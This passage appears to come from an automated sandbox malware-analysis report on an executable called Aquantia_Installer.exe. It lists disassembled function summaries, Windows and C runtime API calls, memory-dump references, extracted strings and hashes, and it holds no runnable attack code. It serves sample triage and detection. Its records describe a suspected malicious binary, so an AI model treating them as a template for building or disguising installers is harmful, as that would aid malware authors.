                                                                        • _free.LIBCMT ref: 6CF34DAE
                                                                        • _free.LIBCMT ref: 6CF34DC6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 8039e775162742d8ef8245b343fd6e855d26de8dd66bde687d285d842df8e596
                                                                        • Instruction ID: b9131c9c2cafefc2a561ac8983cafda48ad1bfb52f96d9d3619ba83c250beb5c
                                                                        • Opcode Fuzzy Hash: 8039e775162742d8ef8245b343fd6e855d26de8dd66bde687d285d842df8e596
                                                                        • Instruction Fuzzy Hash: C331A231604721BFEB168A79D845B8A7FE4EF40359F206419E46DD7A50DF32EA44CBE0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1819 6cf31e63-6cf31e76 1820 6cf31e82-6cf31f2f call 6cf325a4 * 9 call 6cf31c8f call 6cf31cfa 1819->1820 1821 6cf31e78-6cf31e81 call 6cf325a4 1819->1821 1821->1820
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 89e607f257bffda1cef013b828c52fd416ffed337086e275c35c6e0c40e14a80
                                                                        • Instruction ID: 9cf954ba70fe0f514cfd5cb4094da0fb4a5304f1bc042bf1f6ee9a56d324bc3d
                                                                        • Opcode Fuzzy Hash: 89e607f257bffda1cef013b828c52fd416ffed337086e275c35c6e0c40e14a80
                                                                        • Instruction Fuzzy Hash: BA21F476910118BFCF46DFA4C995DDE7BB8AF48244F0091A6A5099B621DB32EB48CFD0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1846 1009580-10095b3 1847 10095c0-10095d2 1846->1847 1847->1847 1848 10095d4-10095ef 1847->1848 1849 10095f0-100964a 1848->1849 1849->1849 1850 100964c-10096b5 1849->1850 1851 10096c0-10096ef 1850->1851 1851->1851 1852 10096f1-100970f 1851->1852 1853 1009710-1009724 1852->1853 1853->1853 1854 1009726-100972f 1853->1854 1855 1009731-1009737 1854->1855 1856 100974b-100975c 1854->1856 1857 1009740-1009749 1855->1857 1858 100977b-1009785 1856->1858 1859 100975e-1009761 1856->1859 1857->1856 1857->1857 1861 1009787-100978b 1858->1861 1862 100979b-10097a3 1858->1862 1860 1009770-1009779 1859->1860 1860->1858 1860->1860 1863 1009790-1009799 1861->1863 1864 10097a5-10097a6 1862->1864 1865 10097bb-10097c5 1862->1865 1863->1862 1863->1863 1866 10097b0-10097b9 1864->1866 1867 10097c7-10097cb 1865->1867 1868 10097db-10097e3 1865->1868 1866->1865 1866->1866 1869 10097d0-10097d9 1867->1869 1870 10097e5-10097e6 1868->1870 1871 10097fb-1009804 1868->1871 1869->1868 1869->1869 1872 10097f0-10097f9 1870->1872 1873 1009806-100980a 1871->1873 1874 100981b-1009837 1871->1874 1872->1871 1872->1872 1875 1009810-1009819 1873->1875 1875->1874 1875->1875
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "$559$7;50$<8.>$=;;8$>#$DvEU$NE$]\$bLHN
                                                                        • API String ID: 0-1299258786
                                                                        • Opcode ID: 4af797183462da662cd56a78a9d35b40f1d34d7270037a1acc0aea5cb2638b7a
                                                                        • Instruction ID: af29ee2f4ea484549d1f4adf5694dff1279b0bba92662108f08b1426f0b57097
                                                                        • Opcode Fuzzy Hash: 4af797183462da662cd56a78a9d35b40f1d34d7270037a1acc0aea5cb2638b7a
                                                                        • Instruction Fuzzy Hash: 2271D66510C3C28FE7128F29845476BFFE1AF92218F18899DE4D9972C7C779C50AC762
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CF30477
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CF3047F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CF30508
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CF30533
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CF30588
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 128111c820be73e86b73498dfaf1663998cf69bae3ec1611ef0ba1d340615690
                                                                        • Instruction ID: 692540e678d0b710ba2e6336ff2aa9736bb3dbb9622ff19462e35ad9107490ed
                                                                        • Opcode Fuzzy Hash: 128111c820be73e86b73498dfaf1663998cf69bae3ec1611ef0ba1d340615690
                                                                        • Instruction Fuzzy Hash: E241A434E011A8BBCF10CF69C844A9EBBB5AF45318F109156E82C6B751D7B1DA05CFE0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        • Opcode ID: fcedd9d8cf162492e6db9b5356e6907e3a1dd44110cd44ec11fe5f8e5276bcd4
                                                                        • Instruction ID: 322e9a37977eb7a34bd467be6d9c7e21e696e153010505cb56a6aa2e3e768ac6
                                                                        • Opcode Fuzzy Hash: fcedd9d8cf162492e6db9b5356e6907e3a1dd44110cd44ec11fe5f8e5276bcd4
                                                                        • Instruction Fuzzy Hash: 1E210872E01231BBDF21CA6A8C44B5E3768EF027A5F213511E91DAB691E730EC0AC5E0
                                                                        APIs
                                                                          • Part of subcall function 6CF36D1E: _free.LIBCMT ref: 6CF36D43
                                                                        • _free.LIBCMT ref: 6CF36DA4
                                                                          • Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
                                                                          • Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC
                                                                        • _free.LIBCMT ref: 6CF36DAF
                                                                        • _free.LIBCMT ref: 6CF36DBA
                                                                        • _free.LIBCMT ref: 6CF36E0E
                                                                        • _free.LIBCMT ref: 6CF36E19
                                                                        • _free.LIBCMT ref: 6CF36E24
                                                                        • _free.LIBCMT ref: 6CF36E2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 74abff0297f89508d370d25e7923fd1f494c8f40879c02b314269e353b2f71c9
                                                                        • Instruction ID: 27749e1716e68ff4dd6ee4bc6f255515a2e45931759bdb0af67f277b17d5ddd1
                                                                        • Opcode Fuzzy Hash: 74abff0297f89508d370d25e7923fd1f494c8f40879c02b314269e353b2f71c9
                                                                        • Instruction Fuzzy Hash: 01118671540B29BAD6A2ABB0CC0BFCBB79C7F04708F501815B29DE6A51DBB5B61C47D0
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CF35EB7
                                                                        • __fassign.LIBCMT ref: 6CF3609C
                                                                        • __fassign.LIBCMT ref: 6CF360B9
                                                                        • WriteFile.KERNEL32(?,6CF34654,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF36101
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CF36141
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF361E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                        • String ID:
                                                                        • API String ID: 1735259414-0
                                                                        • Opcode ID: 2f84018d91e28b7ddcc9f8c60b2ce54c8b78908d5240a85627e53b40e545824a
                                                                        • Instruction ID: 9dc4c150061962cce3aaaa7a4c4c6bcef220a74091099415318fe419182ac010
                                                                        • Opcode Fuzzy Hash: 2f84018d91e28b7ddcc9f8c60b2ce54c8b78908d5240a85627e53b40e545824a
                                                                        • Instruction Fuzzy Hash: 41C19F75D01268AFCF11CFE8C8809EDBBB5BF09314F28516AE859FB641D731A946CB90
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000001,?,6CF305E5,6CF2F710,6CF2F129,?,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120,0000000C,6CF2F45A), ref: 6CF30925
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF30933
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF3094C
                                                                        • SetLastError.KERNEL32(00000000,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120,0000000C,6CF2F45A,?,00000001,?), ref: 6CF3099E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: b31a55cde450b340c9daf01bedab8197a89e6328ab1266d436d360d4cbc9d084
                                                                        • Instruction ID: 5092a44fe52ab24ad62a74f27202ae2a444747a2d0d188463f6b3ca6ad9bc73e
                                                                        • Opcode Fuzzy Hash: b31a55cde450b340c9daf01bedab8197a89e6328ab1266d436d360d4cbc9d084
                                                                        • Instruction Fuzzy Hash: 0501523361B276BDBB541A7A5C84A9B37B8DB076B9720232BE12C95BD0EB91480592C4
                                                                        Strings
                                                                        • C:\Users\user\Desktop\Aquantia_Installer.exe, xrefs: 6CF32E15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user\Desktop\Aquantia_Installer.exe
                                                                        • API String ID: 0-475832001
                                                                        • Opcode ID: 6575070135c9434486b56a8e3c552bb1c8895769459ceaae629435c75b56e5b6
                                                                        • Instruction ID: c2c044c22efcd0af9caca641ebd60860a4ec46d1ce6235aff51335416c752573
                                                                        • Opcode Fuzzy Hash: 6575070135c9434486b56a8e3c552bb1c8895769459ceaae629435c75b56e5b6
                                                                        • Instruction Fuzzy Hash: F621B372604229BF9B109B668C899C777ADAF013687046614F91C97E92DB32ED818BE0
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,6CF30B54,00000000,?,00000001,00000000,?,6CF30BCB,00000001,FlsFree,6CF3AD3C,FlsFree,00000000), ref: 6CF30B23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3664257935-2084034818
                                                                        • Opcode ID: db4dc3b1605af957b5643c9e9e99a4a9611e17abe1a60bd1342916807d0f29ae
                                                                        • Instruction ID: 575b111fa8dc3a2386e3cd226d21f69a8eff5c00cf38f16fba863a27d69339ff
                                                                        • Opcode Fuzzy Hash: db4dc3b1605af957b5643c9e9e99a4a9611e17abe1a60bd1342916807d0f29ae
                                                                        • Instruction Fuzzy Hash: F211CA32F41675BBDF228AA98C40B4A33B4AF0276CF152212E91CE7680D7B4ED0086D5
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CF310FC,?,?,6CF310C4,?,00000001,?), ref: 6CF3115F
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CF31172
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,6CF310FC,?,?,6CF310C4,?,00000001,?), ref: 6CF31195
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 18e8d36e2f53f69bdc7ffc9af2ff3e99ab6cd0cee8f3ecc6a86b0f6b279deb1e
                                                                        • Instruction ID: 61bea9a687f2f29c70d00386218b7ad44aa47e0c1dcb01a8d7d8a72b83673141
                                                                        • Opcode Fuzzy Hash: 18e8d36e2f53f69bdc7ffc9af2ff3e99ab6cd0cee8f3ecc6a86b0f6b279deb1e
                                                                        • Instruction Fuzzy Hash: C2F08231A11128FBDF11ABD2CD09BDE7ABAEB01359F114060F419A2190CB38CE00DBD0
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 6CF357EB
                                                                        • __alloca_probe_16.LIBCMT ref: 6CF358B1
                                                                        • __freea.LIBCMT ref: 6CF3591D
                                                                          • Part of subcall function 6CF3491D: HeapAlloc.KERNEL32(00000000,6CF34654,6CF34654,?,6CF33354,00000220,?,6CF34654,?,?,?,?,6CF36771,00000001,?,?), ref: 6CF3494F
                                                                        • __freea.LIBCMT ref: 6CF35926
                                                                        • __freea.LIBCMT ref: 6CF35949
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: bf04b53e4f2922a139ee37d45516fb258e337c1c206bfb0af45a6aed9e427ca5
                                                                        • Instruction ID: 3180d1f316a5fdf5a9d0572be74327e31c159d54c47c3e83c1038feec241aa8e
                                                                        • Opcode Fuzzy Hash: bf04b53e4f2922a139ee37d45516fb258e337c1c206bfb0af45a6aed9e427ca5
                                                                        • Instruction Fuzzy Hash: CF51A07260122ABBEF118E64CC40EAF36A9EF85768F255129FC1C9B650D730DD4587E0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 6CF36CCD
                                                                          • Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
                                                                          • Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC
                                                                        • _free.LIBCMT ref: 6CF36CDF
                                                                        • _free.LIBCMT ref: 6CF36CF1
                                                                        • _free.LIBCMT ref: 6CF36D03
                                                                        • _free.LIBCMT ref: 6CF36D15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 5dabbb912b084fc22b0172622c64727333b3d7d49622ef49542f2e0a8b717051
                                                                        • Instruction ID: 977af31a4d2147f0b957f4be189fb76208f71549dcd8e4b440f7924452a1deef
                                                                        • Opcode Fuzzy Hash: 5dabbb912b084fc22b0172622c64727333b3d7d49622ef49542f2e0a8b717051
                                                                        • Instruction Fuzzy Hash: 90F06831602625778A85DB58E58AD6733F9BF823157742806F41DD7E01CB71F98087F0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: *?
                                                                        • API String ID: 269201875-2564092906
                                                                        • Opcode ID: 1d30c4eb8f67effc4f09546b95444d24f787f1f7996d8da2a8d7ffcc56a4a3fe
                                                                        • Instruction ID: b3f7a78f6ef188bbca3246f38465859012d1ae9e41ec7fedf568850cb3c753ad
                                                                        • Opcode Fuzzy Hash: 1d30c4eb8f67effc4f09546b95444d24f787f1f7996d8da2a8d7ffcc56a4a3fe
                                                                        • Instruction Fuzzy Hash: A5615E75D00229AFDB14CFA9C8845DDFBF5EF48314B28916AD858E7701D732AE458BE0
                                                                        APIs
                                                                          • Part of subcall function 6CF32CCA: _free.LIBCMT ref: 6CF32CD8
                                                                          • Part of subcall function 6CF3389E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CF35913,?,00000000,00000000), ref: 6CF3394A
                                                                        • GetLastError.KERNEL32 ref: 6CF32710
                                                                        • __dosmaperr.LIBCMT ref: 6CF32717
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CF32756
                                                                        • __dosmaperr.LIBCMT ref: 6CF3275D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        • Opcode ID: 054bd9e2e815fe4ac2dcbaa71ad20bf09e09b0eec5c94d3b2cc36e564c8b5c41
                                                                        • Instruction ID: de0dfaa437a8ac8720b2eee246f870846f716a85c4b2c24664447e4d599e0295
                                                                        • Opcode Fuzzy Hash: 054bd9e2e815fe4ac2dcbaa71ad20bf09e09b0eec5c94d3b2cc36e564c8b5c41
                                                                        • Instruction Fuzzy Hash: 5D21A472604225BF9B109F6A8C8C99B77BCFF413697049615E91D97A52DB32ED008BE0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,6CF362B7,?,00000001,6CF346C5,?,6CF36771,00000001,?,?,?,6CF34654,?,00000000), ref: 6CF31FAD
                                                                        • _free.LIBCMT ref: 6CF3200A
                                                                        • _free.LIBCMT ref: 6CF32040
                                                                        • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CF36771,00000001,?,?,?,6CF34654,?,00000000,00000000,6CF3F360,0000002C,6CF346C5), ref: 6CF3204B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: 4451c1f70ac8c0e8ca9d4184b8d110daf39cbb1fb494496fddf1e12b9a02259e
                                                                        • Instruction ID: 30be265ff8e4b3bb734496be50439016e95cd392831ef252c2ef688e7a778a3c
                                                                        • Opcode Fuzzy Hash: 4451c1f70ac8c0e8ca9d4184b8d110daf39cbb1fb494496fddf1e12b9a02259e
                                                                        • Instruction Fuzzy Hash: 3D11E37660513A7A9B4166B58C88F6B32799FC327CB242624F12C82A85DF26CC0D82E0
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001), ref: 6CF3751D
                                                                        • GetLastError.KERNEL32(?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?,00000001,?,6CF36792,6CF34654), ref: 6CF37529
                                                                          • Part of subcall function 6CF374EF: CloseHandle.KERNEL32(FFFFFFFE,6CF37539,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?,00000001), ref: 6CF374FF
                                                                        • ___initconout.LIBCMT ref: 6CF37539
                                                                          • Part of subcall function 6CF374B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF374E0,6CF36F4D,00000001,?,6CF36246,?,?,00000001,?), ref: 6CF374C4
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CF36F60,?,00000001,?,00000001,?,6CF36246,?,?,00000001,?), ref: 6CF3754E
                                                                        Memory Dump Source
